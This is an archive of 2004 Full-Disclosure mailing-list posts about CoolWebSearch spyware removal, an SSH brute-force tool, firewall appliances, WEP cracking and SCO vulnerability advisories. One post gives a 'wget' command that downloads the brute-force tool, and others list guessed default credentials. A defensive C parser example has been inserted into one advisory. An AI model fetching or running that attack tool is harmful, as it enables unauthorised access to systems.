[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of JacK
Sent: Friday, July 30, 2004 11:56 AM
To: full-disclosurelists.netsys.com
Subject: Re: Re: [Full-Disclosure] Cool Web Search

> I don't know if you fully understand HiJackThis or maybe I was just
> unclear.

> HiJackThis wasn't used by me to get rid of CWS as, for example, running
> Adaware gets rid of tracking cookies and some installed spyware progs. It
> was used by me to list various entries in registry which, when lumped
> together like that, show off CWS quite easily. Once they are there, removing
> them and the progs started by some of them is easy.

> That is all you have to do. Don't expect HiJackThis to magically get rid of
> it all at the flick of a button. You DO have to have a small amount of
> registry knowledge in order to ID which entries are seriously bull and which
> are honest BHOs etc. I am not a registry "expert" but claim a small amount
> of registry knowledge so even to ME it was obvious what was what.

It's obvious you did not get the variants I am speaking about and you are
no Registry "expert" ;)

For those variants:

HijackThis lets you see the entry
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Windows\AppInit_DLLs
(and in most cases with no value) BUT when you delete it and click refresh,
it comes back immediately because the trojan is still running.
If you kill the associated running random-name DLL (for instance
c:\windows\system32\logb.dll) it comes back at the next reboot and adds the
value AppInit_DLLs again in the registry.

To get rid of it, you have to rename the key
HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Windows to Windows2,
then delete the entry AppInit_DLLs which seems to have no value. When
done, rename the key back to its regular name and AppInit_DLLs will not appear
anymore when refreshing; only when that's done will you be able to kill and
delete the random-name DLL for good, which is the Backdoor.Agent.ba used to
install this tricky variant of CoolWebSearch.

That's why I said HijackThis has its limits: deleting the entries its
log gives directly from the registry does not help.

That's just an example; there are other variants which add the registry
entry AppInit_Dlls somewhere else with the same result and the same way to
get rid of it.

Hoping it's clearer now; sorry for my poor English.

Regards,
--
http://www.optimix.be.tf /MVP WindowsXP/ http://websecurite.org
http://www.msmvps.com/XPditif/
http://experts.microsoft.fr/longhorn4u/
                         *Helping you void your warranty since 2000*

(*0*) JacK

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Stefan Janecek (stefan.janecekjku.at)
Date: Fri Jul 30 2004 - 14:20:14 CDT


On Fri, 2004-07-30 at 13:51, Jan Muenther wrote:
> Now, if anybody could jump through the hoop and send me the thing or make it
> publicly available... all these things are musings, 'it looks as if...' and 'it
> seems like...' are not exactly results of an analysis.

Agreed. The thing *is* publicly available, just do 'wget
frauder.us/linux/ssh.tgz'. What kept me from disassembling the thing so
far is not availability, but lacking knowledge about the ssh protocol on
my side ;-)
 
>
> Just tracing tcpdump's output is definitely insufficient.
> If the tool just sends normal TCP packets, then why does it need root rights,
> which you typically only require for raw sockets to build packets which can't
> be constructed with SOCK_STREAM or SOCK_DGRAM?
>

The tool itself does not need root rights. What needs to be root is the
portscanner accompanying it.

> I hope you don't run it on your production boxes in the normal userland - ever
> considered the fact it might contain an ELF infector or something?
> Now, if I wanted to deploy malware on a Linux box, I'd just come up with a
> mysterious looking tool and let that infect the machines of people who just
> run anything they can get a hold of. It's Linux, after all, right? No viruses,
> right?

hehe. According to a brief look at the strace of this thingy, it does
not do anything suspicious on the local box. But maybe I should have a
second look - who knows?

>
> > >Do I take it that these things are just trying to log in using some
> > >guessed password(s) ? Out of interest, do we have any idea what these
> > >opportunistic passwords might be ?
> >
> > At least two of them are guest:guest and test:test. I'd guess that
> > root:root and admin:admin are on the list too :-)
>
> This thing needs to be disassembled, debugged and traced. All else is just
> whistling in the dark. Meh.

Right. And somebody volunteered for this job right now, did you? ;-)

cheers,
Stefan

>
> Cheers, J.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Andrew Farmer (andfarmteknovis.com)
Date: Fri Jul 30 2004 - 15:28:33 CDT


On 30 Jul 2004, at 04:51, Jan Muenther wrote:
> Now, if anybody could jump through the hoop and send me the thing or
> make it
> publicly available... all these things are musings, 'it looks as
> if...' and 'it
> seems like...' are not exactly results of an analysis.

Someone had posted a link to the package -
http://frauder.us/linux/ssh.tgz IIRC.
I've got a copy if the original's down.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)

iD8DBQFBCq9xPa6RRaKl0ScRAoWqAKCL2fObbVwzdidj/0Y65eOHr6zPrgCgk4dW
+/mRrtXdUjQUXv/r0+1PVFo=
=LVWB
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Security Web Site Hosting

From: n30 (n30_listshotmail.com)
Date: Fri Jul 30 2004 - 10:08:06 CDT


Friends,

Trying to start a good free security site....

Any recommendations on site hosting services / portal frameworks / site
builders...

I have the concept in mind but no time to build the site or resources to
host it myself...

Any help appreciated!!
Thanks
-h

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: Re: [Full-Disclosure] Cool Web Search

From: Ron DuFresne (dufresnewinternet.com)
Date: Fri Jul 30 2004 - 15:40:06 CDT


. We pay for point and click, why shouldn't we get it? ;)
>

<ROFL>!!! You do, you get it and then pay, and pay and pay again, each and
every new Win sploit that is released. And then pay again to have those
MCSEs stare blankly at the root cause....

Thanks,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
        ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Why should one buy (or not) an Appliance-based security gateway?

From: Valdis.Kletnieksvt.edu
Date: Fri Jul 30 2004 - 15:45:46 CDT


On Fri, 30 Jul 2004 14:55:04 -0300, Bernardo Santos Wernesback <bernardoish.com.br> said:

> A few colleagues and I started a discussion as to why one should or shouldn't
> buy an appliance-based firewall, ids/ips or other security appliance instead of
> installing software on a server.

Does "installing software on a server" mean:

a) Building your own sentinel/gateway box and installing security software on it
or
b) installing security software directly on the server that needs protection?

> We thought about patching, performance, and other reason for each option but
> I'd like to hear what other people think.

An often overlooked issue is that the right choice for a clued and technically
competent site is quite often a poor choice for a site that's not able to
get its clue together. And there's a lot more of the latter than the former.

The best thing about an appliance is it's an *appliance* - a site can get
it, park it in its spot, plug the DMZ-side and inside-side cables into it,
do a little bit of basic config, and it works. The more configuration
knobs, the more chances to break it by accident.

And if you're installing software directly on the server that needs protecting,
that's just a disaster waiting to happen, especially in the Windows world -
the last thing a low-level admin needs is for the security software to install
a DLL that's incompatible with the service to be protected.....

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFBCrN5cC3lWbTT17ARAkpFAKCnyinXWi50wW+crTScfxvjd5xUTwCgrZmf
REOBFyhkW5l0p5F5JMRCggs=
=NzdN
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Why should one buy (or not) an Appliance-based security gateway?

From: Todd Towles (toddtowlesbrookshires.com)
Date: Fri Jul 30 2004 - 15:43:14 CDT


Max,

How big are these networks that use default firewall rules? In a large,
growing corporate network, we have to deal with stuff all the time. Users
want to do this... some other company or vendor needs a port open to do
something. They want you to just do it because all the other companies do
it. Kinda sad. Lol

Fault-tolerant firewalls, border routers, proxy with virus scan... access
lists, IDS, you know you need the works to protect an enterprise-size network.

Todd

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Max Valdez
Sent: Friday, July 30, 2004 1:26 PM
To: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] Why should one buy (or not) an
Appliance-based security gateway?

Because you don't know that much about security??? (a theoretical "you"!!)

If you know what you need, and what you can do, you do it by yourself, and
only rely on your capacities.

If you need protection, or at least some kind of monitoring activity, but don't
know much about network security, then you go and buy a solution.

That's what I think.

BTW, all the network admins I know use firewalls for protection, but don't know
much aside from that, most of the time use some kind of precoded rules, and
keep it like that forever.

--
Linux garaged 2.6.7-rc3-mm2 #2 Sat Jun 19 15:43:32 CDT 2004 i686 Intel(R)
Pentium(R) 4 CPU 2.80GHz GenuineIntel GNU/Linux
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GS/S d- s: a-29 C++(+++) ULAHI+++ P+ L++>+++ E--- W++ N* o-- K- w++++ O- M--
V-- PS+ PE Y-- PGP++ t- 5- X+ R tv++ b+ DI+++ D- G++ e++ h+ r+ z**
------END GEEK CODE BLOCK------
gpg-key: http://garaged.homeip.net/gpg-key.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
[Full-Disclosure] WEP Crack utility for Windows XP

From: Simmons, Thomas (Thomas.Simmonsncfcorp.com)
Date: Fri Jul 30 2004 - 15:53:17 CDT


Does anyone know of a good WEP cracking utility that will run on Windows
XP?

Thomas Simmons
Network\Server Support
Thomas.SimmonsNCFCorp.Com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
FW: [Full-Disclosure] Cool Web Search

From: Simmons, Thomas (Thomas.Simmonsncfcorp.com)
Date: Fri Jul 30 2004 - 15:58:28 CDT


I have found that if you do an "end process tree" on everything running
that you don't want. Then run through the "ADD & Remove" to remove
everything that you see is not wanted. Follow up with Spybot S&D and
then use HijackThis to remove unwanted Reg problems. Often during the
process of removing apps or even using Spybot you have to reboot and
that requires that you run through the "end process tree" function each
time. I follow up with one last sweep through "add & remove Programs".
This is usually a successful way to remove all Spyware Apps without much
complication.

Thomas Simmons
Network/Server Support

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Andrew
Clover
Sent: Friday, July 30, 2004 6:44 AM
To: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] Cool Web Search

Gregh <chowsozemail.com.au> wrote:

> It was used by me to list various entries in registry which, when lumped
> together like that, show off CWS quite easily. Once they are there, removing
> them and the progs started by some of them is easy.

This is not the case for all variants of CWS. The newer, sneakier
variants can rebuild themselves if they detect a program like HijackThis
removing their registry entries.

This is part of a strong trend in unsolicited commercial software,
copying survival techniques learned from virus authors. The use of
constantly-loaded multiple DLLs and/or processes and/or services that
all restart and repair each other if tampering is detected, is becoming
widespread (see also CommonName, ClearSearch, TVMedia etc.).

Where there are not short-cut workarounds this means removing the
software manually is simply impossible. Currently a trip into Safe Mode
can do the trick, by stopping any of the software running, but I'm sure
that'll be worked around too eventually. (Rootkit-like spyware?)

--
Andrew Clover
mailto:anddoxdesk.com
http://www.doxdesk.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
RE: [Full-Disclosure] Cool Web Search

From: Schmidt, Michael R. (Michael.SchmidtT-Mobile.com)
Date: Fri Jul 30 2004 - 16:10:30 CDT


I will take up arms to write a cleaner for it. I despise programs like this

Since we are talking about 30 variations does anyone know where a person can get archived versions of all of these?

I've got a machine and the tools and know how to build the tool. I just need to be "infected" - wow, 30 variants. That is truly ugly.

Thanks

Michael R. Schmidt

-----Original Message-----
From: full-disclosure-adminlists.netsys.com [mailto:full-disclosure-adminlists.netsys.com]On Behalf Of Andrew Clover
Sent: Friday, July 30, 2004 11:27 AM
To: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] Cool Web Search

Gregh <chowsozemail.com.au> wrote:

> the truth is that this way DOES get rid of it. There are
> at LEAST 5 variants of CWS.

Oh, there are *many* more than that.

> I have met them all and beat them all.

Obviously you have not met the CWS/About variant. This cannot be removed
with only HijackThis and the Task Manager, as its process will recreate
any registry entries you delete. Which process? Every process you are
running, thanks to the AppInit_DLLs entry.

> All easily beaten by using HiJackThis in the way I described.

Well done. Now go install CWS/About, TVMedia/BHO, CommonName/Comwiz and
HuntBar/WinTools, and see how you get on.

HijackThis is a brilliant tool. But it is not a panacea, and the worst
of the crop are starting to code around the things it can do.

--
Andrew Clover
mailto:anddoxdesk.com
http://www.doxdesk.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
Re: [Full-Disclosure] Cool Web Search

From: Gregh (chowsozemail.com.au)
Date: Fri Jul 30 2004 - 16:29:22 CDT


----- Original Message -----
From: "Andrew Clover" <and-bugtraqdoxdesk.com>
To: <full-disclosurelists.netsys.com>
Sent: Saturday, July 31, 2004 4:26 AM
Subject: Re: [Full-Disclosure] Cool Web Search

> Gregh <chowsozemail.com.au> wrote:
>
> > the truth is that this way DOES get rid of it. There are
> > at LEAST 5 variants of CWS.
>
> Oh, there are *many* more than that.
>
> > I have met them all and beat them all.
>
> Obviously you have not met the CWS/About variant. This cannot be removed

Look, I have reported how easily it can be removed. If all you want to do is
argue about it, I have to tell you that I can't beat that. If you want to try
it for yourself, you'll see it is easy to do the way I described.

I have said all I can on this subject now. The rest is up to you lot. If you
reading this want to try, you'll see how ridiculously easy it is to remove
it. If you don't want to try and want to say it can't be done, then for you
saying that, obviously it can't.

Greg.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Why should one buy (or not) an Appliance-based security gateway?

From: Todd Towles (toddtowlesbrookshires.com)
Date: Fri Jul 30 2004 - 16:00:29 CDT


I haven't done too much research into appliance-based devices, but you would
guess that they are set up for one purpose.

If I was going to build a Snort IDS box, it wouldn't have telnet open and it
wouldn't use HTTP (unless I was using ACID, then I would use SSL).

If I wanted to make a DHCP server - I would take Linux and strip the kernel
of all unneeded modules and recompile. Turn off all unneeded services and
make the image reusable.

Appliance-based devices should use the same idea. But maybe they are like
cars. You can buy a sports car...which is designed for speed. Yet the fuel
map isn't tuned like it could be and that is a lot of back pressure in the
exhaust.

Basically, it comes down to how much you want to learn about network
security and how secure you want to be. Will a properly fine-tuned homemade
system beat an appliance? Yes! But can everyone build that system? No!

Wow, did that make any sense? lol

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Paul Schmehl
Sent: Friday, July 30, 2004 1:34 PM
To: Bernardo Santos Wernesback; full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] Why should one buy (or not) an
Appliance-based security gateway?

--On Friday, July 30, 2004 02:55:04 PM -0300 Bernardo Santos Wernesback
<bernardoish.com.br> wrote:
>
> A few colleagues and I started a discussion as to why one should or
> shouldn't buy an appliance-based firewall, ids/ips or other security
> appliance instead of installing software on a server.
>
> We thought about patching, performance, and other reasons for each option
> but I'd like to hear what other people think.
>
> I would really appreciate if you could share your thoughts with me.
>
1) Most appliance-based devices do not allow access to the operating system
from the application. In fact, they don't even allow access to the
application, except for its configuration.

2) Most appliance-based devices have a kernel and OS that is specifically
built (or the latest buzz word "purpose-built") for the service they
provide, making them capable of running on lower speed processors and lower
memory footprints than a general purpose OS (or conversely, capable of
doing a great deal more with the same CPU speed and memory footprint.)

Those are the two main benefits that I hear most often touted. I haven't
done any research into those claims. Perhaps someone else has?

Paul Schmehl (paulsutdallas.edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
RE: [Full-Disclosure] Cool Web Search

From: Todd Towles (toddtowlesbrookshires.com)
Date: Fri Jul 30 2004 - 17:58:00 CDT


Then we await your very simple tool to remove this bad spyware. If you can
do it with Hijack This...then maybe you should talk to the author and start
work on a new program.

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Gregh
Sent: Friday, July 30, 2004 4:29 PM
To: Disclosure Full
Subject: Re: [Full-Disclosure] Cool Web Search

----- Original Message -----
From: "Andrew Clover" <and-bugtraqdoxdesk.com>
To: <full-disclosurelists.netsys.com>
Sent: Saturday, July 31, 2004 4:26 AM
Subject: Re: [Full-Disclosure] Cool Web Search

> Gregh <chowsozemail.com.au> wrote:
>
> > the truth is that this way DOES get rid of it. There are
> > at LEAST 5 variants of CWS.
>
> Oh, there are *many* more than that.
>
> > I have met them all and beat them all.
>
> Obviously you have not met the CWS/About variant. This cannot be removed

Look, I have reported how easily it can be removed. If all you want to do is
argue about it, I have to tell you that I can't beat that. If you want to try
it for yourself, you'll see it is easy to do the way I described.

I have said all I can on this subject now. The rest is up to you lot. If you
reading this want to try, you'll see how ridiculously easy it is to remove
it. If you don't want to try and want to say it can't be done, then for you
saying that, obviously it can't.

Greg.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
RE: [Full-Disclosure] WEP Crack utility for Windows XP

From: Todd Towles (toddtowlesbrookshires.com)
Date: Fri Jul 30 2004 - 18:01:38 CDT


Grab a copy of any Linux Live-CD and boot it up. Most have AirSnort, Kismet,
Nmap, Ethereal, Ettercap included. You must find the right wireless card to
work with them however.

www.knoppix.com

www.knoppix-std.org/tools.html

www.moser-informatik.ch/

BTW, has WEPCrack ever been ported to Win32?

Todd

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Simmons, Thomas
Sent: Friday, July 30, 2004 3:53 PM
To: Max Valdez; full-disclosurelists.netsys.com
Subject: [Full-Disclosure] WEP Crack utility for Windows XP

Does anyone know of a good WEP Cracking Utility that will run on Windows
XP.

Thomas Simmons
Network\Server Support
Thomas.SimmonsNCFCorp.Com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
[Full-Disclosure] OpenServer 5.0.6 OpenServer 5.0.7 : Xsco contains a buffer overflow that could be exploited to gain root privileges.

please_reply_to_securitysco.com
Date: Fri Jul 30 2004 - 15:27:28 CDT



______________________________________________________________________________

                        SCO Security Advisory

Subject: OpenServer 5.0.6 OpenServer 5.0.7 : Xsco contains a buffer overflow that could be exploited to gain root privileges.
Advisory number: SCOSA-2004.3
Issue date: 2004 July 29
Cross reference: sr889371 fz528866 erg712547 CAN-2004-0083 CAN-2004-0084 CAN-2004-0106
______________________________________________________________________________

1. Problem Description

        A buffer overflow in ReadFontAlias from dirfile.c of Xsco
        may allow local users and remote attackers to execute
        arbitrary code via a font alias file with a long token.

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0083 to this issue.

        Buffer overflow in the ReadFontAlias function in Xsco,
        when using the CopyISOLatin1Lowered function, may allow
        local or remote authenticated users to execute arbitrary
        code via a malformed entry in the font alias file.

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0084 to this issue.

        Multiple flaws in reading font files.

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0106 to these issues.

2. Vulnerable Supported Versions

        System Binaries
        ----------------------------------------------------------------------
        OpenServer 5.0.6 /usr/bin/X11/Xsco
        OpenServer 5.0.7 /usr/bin/X11/Xsco

3. Solution

        The proper solution is to install the latest packages.

4. OpenServer 5.0.6

        4.1 Location of Fixed Binaries

        ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.3

        4.2 Verification

        MD5 (VOL.000.000) = 7341b2e45bfc55b838009d8a1c49d000

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools

        4.3 Installing Fixed Binaries

        Upgrade the affected binaries with the following sequence:

        1) Download the VOL* files to a directory

        2) Run the custom command, specify an install from media
        images, and specify the directory as the location of
        the images.

5. OpenServer 5.0.7

        5.1 Location of Fixed Binaries

        ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.3

        The fixes are also available in SCO OpenServer Release 5.0.7
        Maintenance Pack 3 or later. See
        http://www.sco.com/support/update/download/osr507list.html.

        5.2 Verification

        MD5 (VOL.000.000) = 7341b2e45bfc55b838009d8a1c49d000

        MD5 (507mp3_vol.tar) = c927aefdd50b50aca5d29e08c1562aec

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools

        5.3 Installing Fixed Binaries

        Upgrade the affected binaries with the following sequence:

        1) Download the VOL* files to the /tmp directory

        2) Run the custom command, specify an install from media
        images, and specify the /tmp directory as the location of
        the images.

        Or see the Maintenance Pack 3 Release and Installation Notes at

        ftp://ftp.sco.com/pub/openserver5/507/mp/mp3/osr507mp3.txt

6. References

        Specific references for this advisory:
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0083
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0084
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0106

        SCO security resources:
                http://www.sco.com/support/security/index.html

        SCO security advisories via email:
                http://www.sco.com/support/forums/security.html

        This security fix closes SCO incidents sr889371 fz528866
        erg712547.

7. Disclaimer

        SCO is not responsible for the misuse of any of the information
        we provide on this website and/or through our security
        advisories. Our advisories are a service to our customers
        intended to promote secure installation and use of SCO
        products.

8. Acknowledgments

        Greg MacManus (iDEFENSE Labs) is credited with the discovery
        of this vulnerability. Additionally David Dawes discovered
        further flaws in reading font files.

______________________________________________________________________________


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] UnixWare 7.1.3 Open UNIX 8.0.0 : Xsco contains a buffer overflow that could be exploited to gain root privileges.

please_reply_to_securitysco.com
Date: Fri Jul 30 2004 - 15:27:24 CDT



______________________________________________________________________________

                        SCO Security Advisory

Subject: UnixWare 7.1.3 Open UNIX 8.0.0 : Xsco contains a buffer overflow that could be exploited to gain root privileges.
Advisory number: SCOSA-2004.2
Issue date: 2004 July 29
Cross reference: sr889370 fz528865 erg712546 CAN-2004-0083 CAN-2004-0084 CAN-2004-0106
______________________________________________________________________________

1. Problem Description

        A buffer overflow in ReadFontAlias from dirfile.c of Xsco
        may allow local users and remote attackers to execute
        arbitrary code via a font alias file with a long token.

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0083 to this issue.

        Buffer overflow in the ReadFontAlias function in Xsco,
        when using the CopyISOLatin1Lowered function, may allow
        local or remote authenticated users to execute arbitrary
        code via a malformed entry in the font alias file.

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0084 to this issue.

        Multiple flaws in reading font files.

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0106 to these issues.
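The ReadFontAlias overflow (CAN-2004-0083) described in both Xsco advisories above is the classic missing length check when a token from a font alias file is copied into a fixed-size buffer. The following is an added example, not the Xsco or X.Org source: a bounded reader for one "alias pattern" line of a fonts.alias-style file that rejects any token that would not fit. ALIAS_TOKEN_MAX, read_token, parse_alias_line and the demo_* helpers are constructed names for this illustration.

```c
/* Added example, not the Xsco/X.Org source: a bounded reader for one line of an
 * X11-style fonts.alias file ("alias pattern", optional double quotes, '!' comment).
 * The defect class in the advisory is copying a token into a fixed buffer with no
 * length check; here any token that would not fit is rejected instead. */
#include <ctype.h>
#include <string.h>

#define ALIAS_TOKEN_MAX 64   /* constructed buffer size for this example */

enum alias_status {
    ALIAS_OK        =  0,
    ALIAS_TOO_LONG  = -1,   /* token would overrun the fixed buffer */
    ALIAS_MALFORMED = -2,   /* unterminated quote, or alias with no target */
    ALIAS_EMPTY     = -3    /* blank or comment line */
};

/* Copy one token from *cursor into out (capacity outsz, NUL included).
 * Returns the token length, or ALIAS_EMPTY / ALIAS_TOO_LONG / ALIAS_MALFORMED. */
static int read_token(const char **cursor, char *out, size_t outsz)
{
    const char *p = *cursor;
    size_t n = 0;

    while (*p && isspace((unsigned char)*p))
        p++;
    if (*p == '\0' || *p == '!') {          /* end of line or '!' comment */
        *cursor = p;
        return ALIAS_EMPTY;
    }
    if (*p == '"') {                        /* quoted token: may contain spaces */
        p++;
        while (*p && *p != '"') {
            if (n + 1 >= outsz)             /* the missing check: keep room for the NUL */
                return ALIAS_TOO_LONG;
            out[n++] = *p++;
        }
        if (*p != '"')
            return ALIAS_MALFORMED;         /* unterminated quote */
        p++;
    } else {
        while (*p && !isspace((unsigned char)*p)) {
            if (n + 1 >= outsz)
                return ALIAS_TOO_LONG;
            out[n++] = *p++;
        }
    }
    out[n] = '\0';
    *cursor = p;
    return (int)n;
}

/* Parse "alias pattern" into two fixed buffers of size sz each. */
int parse_alias_line(const char *line, char *alias, char *pattern, size_t sz)
{
    const char *cur = line;
    int r = read_token(&cur, alias, sz);
    if (r < 0)
        return r;                           /* empty/comment line, or an error */
    r = read_token(&cur, pattern, sz);
    if (r == ALIAS_EMPTY)
        return ALIAS_MALFORMED;             /* alias without a target font */
    return r < 0 ? r : ALIAS_OK;
}

/* Parse a constructed line into ALIAS_TOKEN_MAX-sized buffers and report status. */
int demo_parse(const char *line)
{
    char alias[ALIAS_TOKEN_MAX], pattern[ALIAS_TOKEN_MAX];
    return parse_alias_line(line, alias, pattern, sizeof alias);
}

/* A 150-byte alias token: rejected here, where an unchecked copy would overrun. */
int demo_long_token(void)
{
    char line[200];
    memset(line, 'x', 150);
    line[150] = '\0';
    return demo_parse(line);
}
```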
        

2. Vulnerable Supported Versions

        System Binaries
        ----------------------------------------------------------------------
        UnixWare 7.1.3 /usr/X/bin/Xsco
        Open UNIX 8.0.0 /usr/X/bin/Xsco

3. Solution

        The proper solution is to install the latest packages.

4. UnixWare 7.1.3 / Open UNIX 8.0.0

        4.1 Location of Fixed Binaries

        ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2004.2

        4.2 Verification

        MD5 (erg712546.pkg.Z) = a7ca45fddc3990268e2779a16601b323

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools

        4.3 Installing Fixed Binaries

        Upgrade the affected binaries with the following sequence:

        Download erg712546.pkg.Z to the /var/spool/pkg directory

        # uncompress /var/spool/pkg/erg712546.pkg.Z
        # pkgadd -d /var/spool/pkg/erg712546.pkg

5. References

        Specific references for this advisory:
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0083
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0084
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0106

        SCO security resources:
                http://www.sco.com/support/security/index.html

        SCO security advisories via email:
                http://www.sco.com/support/forums/security.html

        This security fix closes SCO incidents sr889370 fz528865
        erg712546.

6. Disclaimer

        SCO is not responsible for the misuse of any of the information
        we provide on this website and/or through our security
        advisories. Our advisories are a service to our customers
        intended to promote secure installation and use of SCO
        products.

7. Acknowledgments

        Greg MacManus (iDEFENSE Labs) is credited with the discovery
        of this vulnerability. Additionally David Dawes discovered
        further flaws in reading font files.

______________________________________________________________________________


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Security Web Site Hosting

From: Simon Richter (geierhogyros.de)
Date: Fri Jul 30 2004 - 16:23:08 CDT


Hi,

> Any recommendations on site hosting services / Portal frameworks / site
> builders...

I've heard PHPNuke is pretty solid.

   Simon

--
GPG Fingerprint: 040E B5F7 84F1 4FBC CEAD ADC6 18A0 CC8D 5706 A4B4

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Stateful Packet Inspection

From: Aaron Gray (angraybeeb.net)
Date: Fri Jul 30 2004 - 15:34:40 CDT


> Look into the iptables/netfilter docs, located here:
> http://www.netfilter.org/documentation/index.html
>
> Connection tracking is explained here
> http://www.sns.ias.edu/~jns/security/iptables/iptables_conntrack.html

Thanks, I looked at netfilter a while ago but found nothing on SPI.

Cheers,

Aaron

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Cool Web Search

From: Raj Varada (miscrajesh.biz)
Date: Fri Jul 30 2004 - 16:35:46 CDT


Gregh wrote:

>Absolute and utter rot! I understand YOU may not be able to do it but it CAN
>be done. It is simple logic if you want to look at it another way - whatever
>can be DONE can be UNdone.
>

Did you really mean "whatever can be done can be UNdone"?
How about a format C:? (I haven't seen "unformat" in a very long time.)

R

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] OpenServer 5.0.6 OpenServer 5.0.7 : OpenSSL Multiple Vulnerabilities

please_reply_to_securitysco.com
Date: Fri Jul 30 2004 - 15:27:33 CDT



______________________________________________________________________________

                        SCO Security Advisory

Subject: OpenServer 5.0.6 OpenServer 5.0.7 : OpenSSL Multiple Vulnerabilities
Advisory number: SCOSA-2004.10
Issue date: 2004 July 29
Cross reference: sr890284 fz529412 erg712603 TA04-078A VU#288574 VU#465542 CAN-2004-0079 CAN-2004-0081 CAN-2004-0112
______________________________________________________________________________

1. Problem Description

        OpenSSL implements the Secure Sockets Layer (SSL) and
        Transport Layer Security (TLS) protocols and includes a
        general purpose cryptographic library. SSL and TLS are
        commonly used to provide authentication, encryption,
        integrity, and non-repudiation services to network
        applications including HTTP, IMAP, POP3, SMTP, and LDAP.

        The U.K. National Infrastructure Security Co-ordination
        Centre (NISCC) and the OpenSSL Project have reported several
        vulnerabilities in the OpenSSL SSL/TLS library (libssl).
        Any application or system that uses this library may be
        affected.

        CERT Vulnerability Note VU#288574
        OpenSSL contains null-pointer assignment in do_change_cipher_spec()
        function

